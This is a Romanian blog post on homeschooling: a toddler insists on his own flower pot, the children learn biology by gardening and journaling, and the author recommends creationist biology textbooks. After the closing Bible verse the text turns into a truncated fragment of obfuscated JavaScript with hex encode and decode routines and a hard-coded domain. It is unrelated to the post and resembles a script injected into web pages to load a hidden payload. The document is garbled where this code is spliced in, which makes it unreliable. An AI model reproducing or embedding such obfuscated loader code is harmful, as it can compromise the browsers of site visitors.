Nu-mi amintesc cum a început pasiunea copiilor pentru grădinărit. Probabil, de mici văzând ghirlandele de mușcate albe, roz și roși de la geamuri care ne încântau cu frumusețea culorilor lor chiar și în sezonul mai rece sau poate văzându-ne primăvara lucrând prin grădină. Oricum, cert este că acum de câte ori dau de vreun sâmbure sau o sămânță imediat se gândesc să o planteze undeva.
Într-una din zile am fost la magazin să-mi cumpăr niște ghivece. Până să mă decid asupra mărimii ghivecelor, cel mai mic mi-a umplut deja coșul cu alte ghivece pe care le găsise el pe un raft mai jos. Le-am luat din coș și le-am pus înapoi pe raft spre dezamăgirea lui, spunându-i că ghivecele nu-s pentru el că-i prea mic, dar el vroia neapărat un ghiveci pentru el. Așa că am cedat și am ales un ghiveci special pentru el. Insistența lui m-a pus pe gânduri, chiar e prea mic (la doi ani și 2 luni) pentru a avea un ghiveci? Când am ajuns acasă eram foarte curioasă să văd dacă îl mai interesează ghiveciul sau a fost doar un moft căruia i-am căzut în capcană. Așa că am stat ca pisica la pândă să văd ce face.
După ce am descărcat mașina, cei mari și-au luat ghivecele și s–au dus în căutarea celui mai bun pământ pentru plantare. Cel mic striga în urma lor: ”Deu, deu, deu!” care în traducere înseamnă ”Și eu, și eu, și eu!” A lăsat orice altă preocupare și a pornit înarmat cu o lopățică spre locul cu pricina. A început să scormonească pământul cu râvnă numai că nu avea unde să-l pună … atunci și-a amintit de ghiveciul lui și a intrat în casă să-l ia. Și-a umplut ghiveciul și mi l-a dat mie în grijă.
Ca părinți, deseori facem greșeala, invocând vârsta drept motiv pentru a interzice o anume activitate copilului și,fără să ne gândim, spunem: ”Ești prea mic, așteaptă să crești, să te faci mare.” Scopul este de a-l convinge pe copil să renunțe. Este un tertip ieftin la care recurgem și trebuie să fim atenți când și cât de des apelăm la el astfel încât să nu distrugem dorința lor de a învăța lucruri noi și de a se angaja în lucrări pe care noi le-am făcut la altă vârstă. Este o minune să vezi copilul interesat sau cum devine interesat de lucrurile de care tu ca părinte ești interesat. Aici este puterea exemplului și dorința înnăscută de a învăța de la cineva, de a copia pe cineva.
Este adevărat că nu învațăm biologie așa cum am învățat-o eu la școală și tocmai aceasta mă neliniștește deseori, eu fiind complet tributară stilului vechi. Totuși, studiul biologiei a început și se desfășoară diferit. Din dorința de a ne hrăni sănătos s-a născut dorința de a crește propriile legume, dar pentru legume îți trebuie răsaduri și ca să ai răsaduri ai nevoie de semințe. Așa că am cumpărat semințe și ghivece. Cum au crescut, le-am transplantat și le veghem cu grijă, pentru că n-au întârzâiat să apară dăunătorii. Pentru fiecare etapă copiii caută pe internet informația de care au nevoie, informație pe care o notează într-un fel de jurnal de grădinărit. Înainte ca informația să fie stocată în jurnal, ea este testată pe teren. De exemplu, am optat pentru tratarea plantelor în mod naturist fără pesticide, ierbicide, insecticide și atunci fiecare tratament naturist trebuie încercat și abia apoi reținut în cazul în care a dat rezultatul dorit. N-ai cum să faci biologie/botanică doar de două ori pe săptămână! Zilnic ești înconjurat de plante, verdeață; zilnic observi lucruri noi. Pasiunea pentru creație crește și la fel și respectul, admirația pentru Creator.
Iată câteva resurse valoroase pe care le folosim în educația acasă și care pot fi folosite și la școala duminicală. Seria de manuale creștine scrise de doamna Maria Popa, care a fost profesoară de biologie timp de 33 de ani, iar schimbarea spirituală care a avut loc în viața ei la vârsta de 51 de ani a determinat-o să dea o nouă direcție felului său de predare și, de asemenea, a inspirat-o să scrie câteva cărți de biologie din punct de vedere creaționist: Zoologie creaționistă, clasa a VI-a și Biologie creaționistă, clasa a IX-a, a X-a, a XI-a. Același material este prezentat în limba română și engleză, uneori mai pe scurt decât în manualele de stat. Elevii au nevoie de cunoștințe esențiale, adevăruri majore, care prezintă creația lui Dumnezeu și care, indiferent de locul de pe glob, sunt aceleași. Iar aceste adevăruri trebuie să le cunoască oricine!
Părinții au de dus o luptă spirituală în primul rând atunci când optează pentru educația acasă, dar, asemeni versetului 18 din Romani 8 în care apostolul Pavel spune:
” Eu socotesc că suferinţele din vremea de acum nu sunt vrednice să fie puse alături cu slava viitoare”,
tot așa beneficiile și frumusețea surprinzătoare a educației acasă întrec cu mult sacrificul părintesc.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return „moldovacrestina.md”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(„http”)==0){return p}for(var e=0;e